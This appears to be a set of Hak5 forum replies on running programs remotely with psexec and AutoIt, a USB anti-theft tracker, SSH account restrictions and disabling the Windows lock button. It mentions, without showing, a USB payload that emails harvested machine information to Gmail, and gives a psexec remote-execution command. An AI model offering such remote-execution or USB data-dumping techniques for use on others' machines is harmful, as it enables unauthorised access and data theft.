pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies

[Launching programs on remote computers]

The people in my house can be trusted and wouldn't know where the heck to start with hacking me. I guess I could understand your concern with security. The problem with using an instant messenger program is that the user might not always be by his/ her computer but would be in the same room. Yeah, i suppose an intercom might be an idea but that's really not an option. Ill just try to figure it out on my own. I think you have given me a good start especially with the psexec tool. I might just give this idea up and try something else. Unless you know how to use sockets in VB.NET 2008 to create a messenger program...

Thanks for all of your help,

Micah C

first download autoIT then paste this into a txt file called beepstart.au3

$cmd = "psexec \\testmachine -u DOMAIN\USER -p PASSWORD -c beep.exe"
Run($cmd)

make sure to change the machine and password part to match your machine.

Then in another file called beep.au3 paste this

Beep()

Compile the beep.au3 to an exe

now all you have to do is double click the beep.au3 or you can compile it to an exe as well. either way you could just make a shortcut for whoeveer to click on in order to make your computer beep.

[Launching programs on remote computers]

The batch script simply creates a beeping sound. Try it out. All i wanted to do is allow one user to click a button on a vb.net form which would execute this script on my computer or vise versa alerting me that a user needs assistance. Does that make sense? ill try to re - explain if it doesn't. Any ideas? remember the users are not computer savvy so something with a GUI interface would be helpful. Thanks for your help so far. I know im a noob @ this sort of thing. Am i just making this harder than it needs to be?

soudns like your better off using an instant messenger program... and if your in the same house you might as well use an intercom....

the problem i dont like with what your trying to do is that you really dont want people having access to your computer like that... remote command execution via a button sounds pretty insecure to me.

[Launching programs on remote computers]

The reason I would like to use vb.net 2008 1. because I know that language best 2. is because the users that will be using this program are not very computer savvy. I was hoping to have a nice GUI so that there is no confusion between the other users. The main goal of this program is to create a beeper so that a family member in one room can simply "beep" me indicating that that user needs assistance. Originally i tried using sockets in VB. I am not very experienced with this so i gave that idea up and moved on to something like we have here.

Any ideas?,

Micah C

what exactly are you trying to do here? what was that script supposed to do?

[Launching programs on remote computers]

Thanks X3N i have found psexce to be a very useful tool for executing and managing remote files. Is it possible to pass this command through VB.NET 2008 with a button control?

Command to be passed with VB.NET 2008:

psexec \\Work1 program "C:\Myprogram.exe"

Any Help is greatly appreciated,

Micah C

it might be possible but kind of redundant... what is the enviroment you are trying to use this in? you could just write a wrapper in vb for psexec i prefer autoIT to vb and theres a few wrappers on the forums for autoit...

Why do you want to use VB?

[USB Lojak]

Hey all,

I've decided to implement all your suggestions thus far.

ddns updater

ping

?mail? -- I need to play with that one a while.

?ftp? if mailing doesn't workout

also I've been looking at windows built-in utillities (hence ftp instead of blat).

perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authoities in case of theft.

Again this isn't aimed at uber-hackers so I'm working under the assumtion that at least on of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need.

i have some autoIT code that will email to gmail using ssl without having ot use blat or stunnel...

i actually have a full payload that dumps all the info over ssl to gmail via autoIT its posted in the usbhacks section.

[USB Lojak]

another way to do this us to use a service like dyndns... which is basically a little program that logs into the dyndns server to bind a name to a dynamic ip address... this could easily be scripted to autorun on a usb drive... the only problem is that if someone has autorun turned off then it totally defeats the purpose because you cant force autorun to run if its disabled.

[SSH into server without using cmd?]

sorry lol so I'll just create multiple accounts with shell "/bin/false" and no rw access? Because I'm thinking about having them pay weekly to use it and if they don't I'll just disable/remove their account

and is there a way to add which accounts can't be logged into through ssh like the /etc/ftpusers file for ftp logins so i don't have to remove their account to disable access if they don't pay?

man if your friends are stupid enough to pay 2 bucks a week for access then thats great for you but sucks for them...for that money you could get some ssh or vpn access elsewhwere...thats actually secure...

your best bet is the keypairing though if your going to use ssh to do this...

[Launching programs on remote computers]

Dear Hak5 Community,

I am looking for a way to execute and stop programs on a computer over my LAN. something really simple. I was hoping that I could execute it through a VB.NET 2008 program. I need to execute this batch file:

::== beep.bat
@echo off

> d.d echo e 100 07
>> d.d echo n 07.bin
>> d.d echo rcx
>> d.d echo 1
>> d.d echo w
>> d.d echo q
debug < d.d > nul
copy 07.bin con > nul
del d.d
del 07.bin
::== DONE

Any help is greatly appreciated.

if you are on a windows domain you can pass the script through the group policy that computer belongs to... if you are not on a domain then your best bet is to copy the script to the computer and telnet or ssh into it and run the script.

another option is using one of the sysinternals tools like psexec to remotly run a command over the network. Sometimes what I will do is use psexec to spawn a remote command shell which is a little more secure then enabling telnet....

[Unlocking a locked workstation?]

Hmm... didn't know that!

I'll have to try and find a third-party tool that can do that on a domain

really this is a non-issue.

There are two ways around this. First if you are running windows server then you should be using active directory to push any changes out to machines and depending on your server setup it may take a few hours for the changes to sync accross the domain.

The second way of getting around this is to make sure the person doesnt lock thier computer.

I found this on some site.... not the prefered way to do it but an option. It would be better to do it using the GPO editor.

If random users chose to lock the system (by pressing Ctrl+Alt+Delete and clicking the Lock Computer button), an administrator would need to manually unlock the system. To avoid this, the Lock Computer button can be disabled.

To disable the Lock Computer button, open Regedit and browse to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\

System and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\

System and create a new REG_DWORD value in each called DisableLockWorkstation. Setting this value to 0 will allow the Lock Computer button to be used, while 1 will disable it.

and as a final thought... what are you doing to these computer that you need to unlock it anyways? Most tasks can be like i mentioned before updated via a logon script or the GPO editor. Those are skills you shoulld work on. If you dont have access to that on your domain then you probably shouldnt be doing any kind of computer unlocking anyways... Also I like to run ultra vnc over the domain which can be setup to use mslogon if you want... but either way its alot handier then RDP for managing remote desktops without the user having to be logged out and you dont have to get out of your seat.